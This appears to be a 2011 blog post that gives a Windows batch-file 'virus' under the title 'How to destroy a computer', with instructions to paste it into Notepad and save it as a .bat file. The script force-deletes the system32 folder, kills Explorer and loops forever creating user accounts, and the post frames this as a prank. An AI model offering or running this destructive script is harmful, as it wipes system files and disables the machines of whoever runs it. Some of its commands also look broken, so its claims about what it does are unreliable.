Sunday, April 17, 2011

How to destroy a computer , Using Notepad

Open Notepad
Copy/Paste This

@echo off
:virus
del /f /q "C:\WINDOWS\system32"
taskkill explorer.exe
tskill explorer.exe
set /a _virus+=1
net user %_virus+% /add
goto virus

Now go to File===>Save As==>name.bat
Now if you open your saved file , your system32 will be delete about 10 min...Dont try this in your PC , if you try , you must Format it :) :) :) :)

0 comments:

Post a Comment